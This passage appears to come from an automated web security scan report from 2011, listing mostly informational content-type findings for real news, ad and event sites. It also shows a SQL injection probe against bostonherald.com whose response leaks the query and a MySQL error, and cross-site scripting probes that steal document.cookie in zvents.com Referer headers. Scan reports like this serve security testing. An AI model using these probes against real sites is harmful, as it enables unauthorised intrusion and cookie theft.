GET /projects/boston_pensions/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 18:06:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 348

SQL:
SELECT a.* FROM `bostonPensioners20090312` a WHERE 1=1 ORDER BY ?1\'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
...[SNIP]...

28.33. http://www.bostonherald.com/track/includes/twitter.inc previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bostonherald.com
Path:	/track/includes/twitter.inc

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /track/includes/twitter.inc HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/track/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=rcHW801DO8kADVvc; bhpopup=on; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; ebNewBandWidth_.www.bostonherald.com=1856%3A1296251858097; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.8.10.1296251844; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __utmb=1.3.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:06 GMT
Server: Apache
Last-Modified: Fri, 28 Jan 2011 14:25:09 GMT
Accept-Ranges: bytes
Content-Length: 26322
Content-Type: text/plain; charset=UTF-8
Connection: close


<p><a class="twitter_name sec_track" href="http://twitter.com/Trackgals/" target="_new">Track Gals</a>: Have you made your reservations for <a href="http://
...[SNIP]...

28.34. http://www.cbs6albany.com/images/logo.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cbs6albany.com
Path:	/images/logo.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /images/logo.gif HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298828234584%26vn%3D1; s_invisit=true; c_m=NoneDirect%20LoadDirect%20Load; cf=1; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296367200803%26vn%3D1; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:37:29 GMT
Server: Apache
Last-Modified: Fri, 17 Oct 2008 09:12:24 GMT
ETag: "1eb7d4d-41b7-4596f5d09ae00"
Accept-Ranges: bytes
Content-Length: 16823
Cache-Control: max-age=86400
Expires: Sat, 29 Jan 2011 17:37:29 GMT
Content-Type: image/gif

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

..........................................................................................................h....
...[SNIP]...

28.35. http://www.moxiesoft.com/tal_products/chat.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.moxiesoft.com
Path:	/tal_products/chat.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Fri, 28 Jan 2011 13:59:24 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

28.36. http://www.paperg.com/jsfb/embed.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.paperg.com
Path:	/jsfb/embed.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

28.37. http://www.screenthumbs.com/tools/js/linkthumbs.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.screenthumbs.com
Path:	/tools/js/linkthumbs.js

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

28.38. http://www.spicefactory.org/parsley/schema/2.2/parsley-core.xsd previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.spicefactory.org
Path:	/parsley/schema/2.2/parsley-core.xsd

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain XML.

Request

GET /parsley/schema/2.2/parsley-core.xsd HTTP/1.1
Host: www.spicefactory.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:14:37 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
Last-Modified: Thu, 22 Apr 2010 08:02:16 GMT
ETag: "16005b-2f9a-4bd00288"
Accept-Ranges: bytes
Content-Length: 12186
Connection: close
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<xs:schema elementFormDefault="qualified"
xmlns="http://www.spicefactory.org/parsley"
xmlns:tns="http://www.spicefactory.org/parsley"
xmlns:xs="ht
...[SNIP]...

28.39. http://www.zvents.com/images/bd_bg.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.zvents.com
Path:	/images/bd_bg.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/bd_bg.gif HTTP/1.1
Host: www.zvents.com
Proxy-Connection: keep-alive
Referer: http://www.zvents.com/?afd62%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E659b6a21bfe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0; Zvents=sd2lntwxc6; zvents_tracker_sid=12963079979400.4568707060534507

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 13:33:45 GMT
Content-Type: image/gif
Content-Length: 181
Last-Modified: Wed, 03 Nov 2010 06:07:09 GMT
Connection: keep-alive
Expires: Sun, 30 Jan 2011 13:33:45 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

.PNG
.
...IHDR...............F[...6PLTEtttjjjnnnqqqXXXaaacccYYYgggVVVTTTfff^^^UUU[[[uuu]]].....(....:IDAT8......0...........}$..0.V.J....fZ.4Q...J..z0.......jx.Z..2.v.....IEND.B`.

28.40. http://www.zvents.com/images/bg_searchbar.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.zvents.com
Path:	/images/bg_searchbar.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/bg_searchbar.gif HTTP/1.1
Host: www.zvents.com
Proxy-Connection: keep-alive
Referer: http://www.zvents.com/?afd62%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E659b6a21bfe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0; Zvents=sd2lntwxc6; zvents_tracker_sid=12963079979400.4568707060534507; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298899998236%26vn%3D1; s_invisit=true; c_m=Noneburpburp; cf=1; s_sq=%5B%5BB%5D%5D; __gads=ID=29529442f7375d88:T=1296308016:S=ALNI_MYQjVN2o43T_cMDeG0v0xQX8dOB-Q

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 13:33:45 GMT
Content-Type: image/gif
Content-Length: 216
Last-Modified: Wed, 03 Nov 2010 06:07:09 GMT
Connection: keep-alive
Expires: Sun, 30 Jan 2011 13:33:45 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

.PNG
.
...IHDR...2...-......a.....HPLTE..O.....,..)....9.....M...../..6..A........F..D..3..%.."....~...... .w.+{<#...KIDATH......0..@.19..SV@...j,.?t..F.1hl.I...4v.C..(4&.S...5..[......%J.(...e.?
...[SNIP]...

28.41. http://www.zvents.com/images/zbutton.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.zvents.com
Path:	/images/zbutton.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/zbutton.gif HTTP/1.1
Host: www.zvents.com
Proxy-Connection: keep-alive
Referer: http://www.zvents.com/?afd62%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E659b6a21bfe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0; Zvents=sd2lntwxc6; zvents_tracker_sid=12963079979400.4568707060534507

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 13:33:36 GMT
Content-Type: image/gif
Content-Length: 635
Last-Modified: Wed, 03 Nov 2010 06:07:09 GMT
Connection: keep-alive
Expires: Sun, 30 Jan 2011 13:33:36 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

.PNG
.
...IHDR..............W.?...2PLTE..............l..C........n.............................
........)..-..............D..............
..$.....;...........U.....7..B....................F..t..~...
...[SNIP]...

28.42. http://www.zvents.com/images/zlogo.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.zvents.com
Path:	/images/zlogo.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/zlogo.gif HTTP/1.1
Host: www.zvents.com
Proxy-Connection: keep-alive
Referer: http://www.zvents.com/?afd62%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E659b6a21bfe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0; Zvents=sd2lntwxc6; zvents_tracker_sid=12963079979400.4568707060534507

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 13:33:36 GMT
Content-Type: image/gif
Content-Length: 1797
Last-Modified: Wed, 03 Nov 2010 06:07:09 GMT
Connection: keep-alive
Expires: Sun, 30 Jan 2011 13:33:36 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

.PNG
.
...IHDR.......<.....$ ......PLTE.....1.....e..............=......................K..q.....W......................................W..~...........:..M...................................j..d..s
...[SNIP]...

28.43. http://www.zvents.com/json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.zvents.com
Path:	/json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /json?jsonsp=Zvents_load_ZventsWidget1&limit=3 HTTP/1.1
Host: www.zvents.com
Proxy-Connection: keep-alive
Referer: http://www.berkshireeagle.com/?f0ba9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7e6d2fe4b4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; Zvents=sd2lntwxc6; zvents_tracker_sid=12963079979400.4568707060534507; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298899998236%26vn%3D1; s_invisit=true; c_m=Noneburpburp; cf=1; s_sq=%5B%5BB%5D%5D; __gads=ID=29529442f7375d88:T=1296308016:S=ALNI_MYQjVN2o43T_cMDeG0v0xQX8dOB-Q; __utmb=48628589; __utmc=48628589; __utma=48628589.1054599713.1296307999.1296307999.1296307999.1; __utmz=48628589.1296308005.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/67|utmcmd=referral; __qca=P0-2063348051-1296308005449; welcome=12963079979400.4568707060534507; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 13:40:19 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 14
ETag: "4dbd31c7d62a4fade659d8056064bbde"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiC3JhZGl1c2lQIgljaXR5IgtEYWxsYXMiCmVycm9yRiINbGF0aXR1ZGVmFzMyLjc4MjUwMTIyMDcwMzEyNSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBAiCnN0YXRlIgdUWA%3D%3D--7570ddda372f0c1dfdd2d0236d256406d694cf75; path=/; expires=Fri, 29-Apr-2011 13:40:19 GMT; HttpOnly
Content-Length: 93

Zvents_load_ZventsWidget1('callback({"rsp":{"status":"ok","content":{"next_page":false}}})')

28.44. http://www.zvents.com/partner_json/search previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.zvents.com
Path:	/partner_json/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /partner_json/search?spn_limit=3&advq=true&swhere=Dallas%2C+TX&srss=0&has_dont_miss_this=1&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.images%2Cevent.starttime&radius=80&ad_limit=1&st=event&jsonsp=jsp_0 HTTP/1.1
Host: www.zvents.com
Proxy-Connection: keep-alive
Referer: http://www.zvents.com/?afd62%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E659b6a21bfe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0; Zvents=sd2lntwxc6; zvents_tracker_sid=12963079979400.4568707060534507; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298899998236%26vn%3D1; s_invisit=true; c_m=Noneburpburp; cf=1; s_sq=%5B%5BB%5D%5D; __gads=ID=29529442f7375d88:T=1296308016:S=ALNI_MYQjVN2o43T_cMDeG0v0xQX8dOB-Q; __utmb=48628589; __utmc=48628589; __utma=48628589.1054599713.1296307999.1296307999.1296307999.1; __utmz=48628589.1296308005.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/67|utmcmd=referral; __qca=P0-2063348051-1296308005449

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 13:33:44 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
X-Rack-Cache: stale, valid, store
X-HTTP_CLIENT_IP_O: 70.244.73.246
Access-Control-Allow-Origin: *
X-Runtime: 169
ETag: "d76222484320078712e1b599465d841b"
X-Content-Digest: fd73232c215f041c773c6b78933a7e7812eabca5
Cache-Control: max-age=1800, public
Age: 0
Content-Length: 6269

jsp_0('callback({"rsp":{"status":"ok","content":{"sponsored_events":[{"name":"Dane Cook","id":149220025,"images":[{"url":"http://www.zvents.com/images/internal/5/2/3/6/img_8946325_thumb.jpg?resample_m
...[SNIP]...

29. Content type is not specified previous next
There are 5 instances of this issue:

http://ad.turn.com/favicon.ico
http://ads.bluelithium.com/st
http://base.liveperson.net/hc/5296924/cmd/url/
https://base.liveperson.net/hc/5296924/
http://www.mixpo.com/favicon.ico

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

29.1. http://ad.turn.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=mBKzL7e3U8ZGre9WC0H4T5Vy7uT76lZYzTAgX1gI0Tupk3fkjDz-oFhodnllmRd81JMY8RXkGx2Pc818psEgN9Lncbxtk4Vq8cIvvle9PRkgcpfbxz6dRvMtAlAkb0mwzqgd6N6CeKh7LtEeNzMSlNLj3qKj0eUvArPFwciatYahKApfnHgOrARRJJ1Q3WZo2JA-MlzxWqdsCzmlros8v7W-LJybjP5rW8OfIeSWiq6Wxd8iDkpRBgczeuDBRfZY; fc=Zko6SdFUw8hMDAXvlj3m9AVsgCSj563yW4r5J3bT9GFRvy6-tKeSzr3CZDTMcZ6xpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; pf=fQr-Lp4pHEigOJn-iFvF6EHhsPKnqdSwqPbqqqZxyu2JwV9kSIzX4BtZ7vBDkFqioGYOK1EVEknK4zK8JJHnRX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"318-1282604189000"
Last-Modified: Mon, 23 Aug 2010 22:56:29 GMT
Content-Length: 318
Date: Fri, 28 Jan 2011 16:39:19 GMT

..............(.......(....... ........................................................................................................3333330.33..330.33..330.33..330.33..330.33..330.33..330.33..330.3
...[SNIP]...

29.2. http://ads.bluelithium.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Request

Response

29.3. http://base.liveperson.net/hc/5296924/cmd/url/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://base.liveperson.net
Path:	/hc/5296924/cmd/url/

Request

GET /hc/5296924/cmd/url/?site=5296924&SV!click-query-name=chat-seo-campaign1&SV!click-query-room=chat-seo-campaign1&SV!click-query-state=Available&SV!click-query-channel=web&page=http%3A//base.liveperson.net/hc/5296924/%3Fcmd%3Dfile%26file%3DvisitorWantsToChat%26site%3D5296924%26SV%21chat-button-name%3Dchat-seo-campaign1%26SV%21chat-button-room%3Dchat-seo-campaign1%26referrer%3D%28button%2520dynamic-button%3Achat-seo-campaign1%28Live%2520Chat%2520by%2520LivePerson%29%29%2520http%253A//solutions.liveperson.com/live-chat/C1/%253Futm_source%253Dbing%2526utm_medium%253Dcpc%2526utm_keyword%253Dlive%252520chat%2526utm_campaign%253Dchat%252520-us&id=4553523208&waitForVisitor=redirectBack&redirectAttempts=10&redirectTimeout=500&&d=1296223648368 HTTP/1.1
Host: base.liveperson.net
Proxy-Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:16:32 GMT
Server: Microsoft-IIS/6.0
